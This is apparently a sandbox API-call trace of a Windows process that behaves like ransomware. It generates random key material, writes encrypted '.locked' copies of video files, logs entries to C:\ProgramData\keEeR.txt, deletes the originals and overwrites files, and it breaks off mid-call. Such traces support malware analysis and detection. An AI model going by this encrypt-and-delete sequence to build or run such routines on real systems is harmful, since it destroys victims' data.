[0317.617] SetEvent (hEvent=0x150) returned 1 [0317.617] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1248be88 | out: lpMode=0x1248be88) returned 0 [0317.617] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.729] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.774] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0317.774] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e020 | out: pbBuffer=0x1234e020) returned 1 [0317.774] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0317.774] WriteFile (in: hFile=0x1c0, lpBuffer=0x12695000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x12695000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0317.776] SetEvent (hEvent=0x1f0) returned 1 [0317.776] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.805] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.811] SetEvent (hEvent=0x1ac) returned 1 [0317.811] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.816] SetEvent (hEvent=0x1f0) returned 1 [0317.816] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0317.832] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.832] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0317.835] SetEvent (hEvent=0x20c) returned 1 [0317.835] SetEvent (hEvent=0x1e8) returned 1 [0317.835] SetEvent (hEvent=0x134) returned 1 [0317.835] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.836] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0317.836] SetEvent (hEvent=0x1e8) returned 1 [0317.836] SetEvent (hEvent=0x134) returned 1 [0317.836] SetEvent (hEvent=0x20c) returned 1 [0317.836] WriteFile (in: hFile=0x208, lpBuffer=0x14446000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12630e78, lpOverlapped=0x0 | out: lpBuffer=0x14446000*, lpNumberOfBytesWritten=0x12630e78*=0xfa000, lpOverlapped=0x0) returned 1 [0317.864] CloseHandle (hObject=0x208) returned 1 [0317.864] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\PjJi9JDPq9zU_NC m384.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\pjji9jdpq9zu_nc m384.flv")) returned 1 [0317.876] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0317.884] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\O-H60h1HeRHC e51ETm0.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\o-h60h1herhc e51etm0.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0317.884] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0317.884] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\O-H60h1HeRHC e51ETm0.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\o-h60h1herhc e51etm0.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0318.058] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.256] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0318.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0318.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0318.256] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0318.256] WriteFile (in: hFile=0x1bc, lpBuffer=0x126bd000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x126bd000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0318.431] ReadFile (in: hFile=0x224, lpBuffer=0x16c52000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16c52000*, lpNumberOfBytesRead=0x1265dd68*=0x16e7e, lpOverlapped=0x0) returned 1 [0318.434] WriteFile (in: hFile=0x1bc, lpBuffer=0x16c52000*, nNumberOfBytesToWrite=0x16e7e, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x16c52000*, lpNumberOfBytesWritten=0x1265dd74*=0x16e7e, lpOverlapped=0x0) returned 1 [0318.470] ReadFile (in: hFile=0x224, lpBuffer=0x16c52000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x16c52000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0318.471] CloseHandle (hObject=0x1bc) returned 1 [0318.507] CloseHandle (hObject=0x224) returned 1 [0318.507] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.528] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0318.528] WriteFile (in: hFile=0x1e0, lpBuffer=0x125ec140*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x125ec140*, lpNumberOfBytesWritten=0x1265de64*=0x48, lpOverlapped=0x0) returned 1 [0318.541] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.565] SetEvent (hEvent=0x134) returned 1 [0318.565] CloseHandle (hObject=0x1e0) returned 1 [0318.592] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.600] SetEvent (hEvent=0x20c) returned 1 [0318.600] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.606] SetEvent (hEvent=0x1e8) returned 1 [0318.606] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.619] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12657a24*=0xc) returned 1 [0318.621] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.626] SetEvent (hEvent=0x1f0) returned 1 [0318.626] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.627] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.656] SetEvent (hEvent=0x198) returned 1 [0318.656] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.659] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.678] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.682] SetEvent (hEvent=0x104) returned 1 [0318.682] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.738] SetEvent (hEvent=0x180) returned 1 [0318.738] SetEvent (hEvent=0x21c) returned 1 [0318.738] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.765] SetEvent (hEvent=0x198) returned 1 [0318.765] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.811] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.821] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0318.821] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0318.821] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0318.821] WriteFile (in: hFile=0x224, lpBuffer=0x12743000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x12743000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0318.824] ReadFile (in: hFile=0x1c0, lpBuffer=0x1608c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1608c000*, lpNumberOfBytesRead=0x12669d68*=0x6ded, lpOverlapped=0x0) returned 1 [0318.825] WriteFile (in: hFile=0x224, lpBuffer=0x1608c000*, nNumberOfBytesToWrite=0x6ded, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x1608c000*, lpNumberOfBytesWritten=0x12669d74*=0x6ded, lpOverlapped=0x0) returned 1 [0318.870] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0318.931] ReadFile (in: hFile=0x1c0, lpBuffer=0x1608c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1608c000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0318.931] CloseHandle (hObject=0x224) returned 1 [0318.933] CloseHandle (hObject=0x1c0) returned 1 [0318.933] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0318.933] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12669e94 | out: lpMode=0x12669e94) returned 0 [0318.933] WriteFile (in: hFile=0x1c0, lpBuffer=0x125ec230*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x12669e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec230*, lpNumberOfBytesWritten=0x12669e64*=0x46, lpOverlapped=0x0) returned 1 [0318.933] CloseHandle (hObject=0x1c0) returned 1 [0318.933] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\JhoWTUZ3 EhtG71Sl-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\jhowtuz3 ehtg71sl-.mp4")) returned 1 [0319.148] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\JhoWTUZ3 EhtG71Sl-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\jhowtuz3 ehtg71sl-.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0320.436] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.438] SetEvent (hEvent=0x14c) returned 1 [0320.438] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x12669e88 | out: lpMode=0x12669e88) returned 0 [0320.438] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.496] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.501] SetEvent (hEvent=0x21c) returned 1 [0320.501] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.507] SetEvent (hEvent=0x220) returned 1 [0320.507] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0320.511] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.511] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0320.512] SetEvent (hEvent=0x184) returned 1 [0320.512] SetEvent (hEvent=0x1ac) returned 1 [0320.512] SetEvent (hEvent=0x190) returned 1 [0320.512] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.513] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0320.513] SetEvent (hEvent=0x150) returned 1 [0320.513] SetEvent (hEvent=0x190) returned 1 [0320.513] SetEvent (hEvent=0x1ac) returned 1 [0320.513] WriteFile (in: hFile=0x1f4, lpBuffer=0x1713a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dbe78, lpOverlapped=0x0 | out: lpBuffer=0x1713a000*, lpNumberOfBytesWritten=0x125dbe78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.539] CloseHandle (hObject=0x1f4) returned 1 [0320.539] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\X12qhHpa.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\x12qhhpa.mp4")) returned 1 [0320.545] WriteFile (in: hFile=0x23c, lpBuffer=0x125ec0f0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x125dee64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0f0*, lpNumberOfBytesWritten=0x125dee64*=0x48, lpOverlapped=0x0) returned 1 [0320.545] CloseHandle (hObject=0x23c) returned 1 [0320.545] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wDTVvpZ38Fq9891Oa2hg.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wdtvvpz38fq9891oa2hg.mp4")) returned 1 [0320.575] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.624] SetEvent (hEvent=0x12c) returned 1 [0320.624] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.644] SetEvent (hEvent=0x190) returned 1 [0320.644] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.650] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.657] SetEvent (hEvent=0x184) returned 1 [0320.657] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0320.704] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.705] SetEvent (hEvent=0x1ac) returned 1 [0320.705] SetEvent (hEvent=0x104) returned 1 [0320.705] SetEvent (hEvent=0x180) returned 1 [0320.705] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.712] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0320.712] SetEvent (hEvent=0x150) returned 1 [0320.712] SetEvent (hEvent=0x1ac) returned 1 [0320.712] SetEvent (hEvent=0x104) returned 1 [0320.712] SetEvent (hEvent=0x180) returned 1 [0320.712] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0320.721] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.945] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.949] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.953] SetEvent (hEvent=0x180) returned 1 [0320.953] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0320.999] SetEvent (hEvent=0x12c) returned 1 [0320.999] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0321.004] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0321.005] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.005] SetEvent (hEvent=0x190) returned 1 [0321.005] SetEvent (hEvent=0x220) returned 1 [0321.005] SetEvent (hEvent=0x14c) returned 1 [0321.005] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.006] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0321.006] SetEvent (hEvent=0x150) returned 1 [0321.006] SetEvent (hEvent=0x14c) returned 1 [0321.006] SetEvent (hEvent=0x220) returned 1 [0321.042] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\l1TF3hoXns.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\l1tf3hoxns.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0321.128] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.192] SetEvent (hEvent=0x150) returned 1 [0321.192] SetEvent (hEvent=0x1ac) returned 1 [0321.192] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0321.192] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.207] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.209] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.211] SetEvent (hEvent=0x14c) returned 1 [0321.211] SetEvent (hEvent=0x12c) returned 1 [0321.211] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.454] SetEvent (hEvent=0x184) returned 1 [0321.454] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0321.455] SetEvent (hEvent=0x184) returned 1 [0321.455] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) Thread: id = 450 os_tid = 0x634 [0311.812] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x343aff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x343aff58*=0x228) returned 1 [0311.812] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x180 [0311.812] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0311.828] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0311.830] SetEvent (hEvent=0x220) returned 1 [0311.830] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0312.020] SetEvent (hEvent=0x190) returned 1 [0312.020] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0312.157] SetEvent (hEvent=0x1f0) returned 1 [0312.157] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0312.405] SetEvent (hEvent=0x14c) returned 1 [0312.405] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.498] SetEvent (hEvent=0x12c) returned 1 [0318.498] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.502] SetEvent (hEvent=0x1dc) returned 1 [0318.502] SetEvent (hEvent=0x1f0) returned 1 [0318.502] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.592] SetEvent (hEvent=0x20c) returned 1 [0318.592] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.600] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.620] SetEvent (hEvent=0x134) returned 1 [0318.620] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.627] SetEvent (hEvent=0x1f0) returned 1 [0318.627] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.632] SetEvent (hEvent=0x1f0) returned 1 [0318.632] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.653] SetEvent (hEvent=0x22c) returned 1 [0318.654] SetEvent (hEvent=0x220) returned 1 [0318.654] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.683] SetEvent (hEvent=0x134) returned 1 [0318.683] SetEvent (hEvent=0x198) returned 1 [0318.683] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.693] SetEvent (hEvent=0x134) returned 1 [0318.693] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.694] SetEvent (hEvent=0x1ac) returned 1 [0318.694] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.736] SetEvent (hEvent=0x22c) returned 1 [0318.736] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x1) returned 0x102 [0318.738] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.738] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x1) returned 0x102 [0318.741] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.741] SetEvent (hEvent=0x21c) returned 1 [0318.741] SetEvent (hEvent=0x12c) returned 1 [0318.741] SetEvent (hEvent=0x20c) returned 1 [0318.742] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x343afb34, ulCount=0x10, ulNumEntriesRemoved=0x343afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x343afb34, ulNumEntriesRemoved=0x343afb14) returned 0 [0318.742] SetEvent (hEvent=0x12c) returned 1 [0318.742] SetEvent (hEvent=0x20c) returned 1 [0318.742] SetEvent (hEvent=0x21c) returned 1 [0318.742] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\dhKZR4KXAkkvWyD1_Aa.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\dhkzr4kxakkvwyd1_aa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0318.743] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125ddd9c | out: lpMode=0x125ddd9c) returned 0 [0318.743] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\dhKZR4KXAkkvWyD1_Aa.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\dhkzr4kxakkvwyd1_aa.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0318.743] GetConsoleMode (in: hConsoleHandle=0x238, lpMode=0x125ddd9c | out: lpMode=0x125ddd9c) returned 0 [0318.744] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0318.744] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0318.744] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0318.744] WriteFile (in: hFile=0x238, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0318.746] ReadFile (in: hFile=0x208, lpBuffer=0x14d04000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x14d04000*, lpNumberOfBytesRead=0x1265bd68*=0x13371, lpOverlapped=0x0) returned 1 [0318.749] WriteFile (in: hFile=0x238, lpBuffer=0x14d04000*, nNumberOfBytesToWrite=0x13371, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x14d04000*, lpNumberOfBytesWritten=0x1265bd74*=0x13371, lpOverlapped=0x0) returned 1 [0318.758] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0318.931] ReadFile (in: hFile=0x208, lpBuffer=0x14d04000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x14d04000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0318.931] CloseHandle (hObject=0x238) returned 1 [0318.932] CloseHandle (hObject=0x208) returned 1 [0318.932] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0318.932] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0318.932] WriteFile (in: hFile=0x208, lpBuffer=0x12352190*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x12352190*, lpNumberOfBytesWritten=0x1265be64*=0x47, lpOverlapped=0x0) returned 1 [0318.932] CloseHandle (hObject=0x208) returned 1 [0318.932] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\dhKZR4KXAkkvWyD1_Aa.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\dhkzr4kxakkvwyd1_aa.avi")) returned 1 [0318.996] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\dhKZR4KXAkkvWyD1_Aa.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\dhkzr4kxakkvwyd1_aa.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.174] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265be88 | out: lpMode=0x1265be88) returned 0 [0320.174] WriteFile (in: hFile=0x1f4, 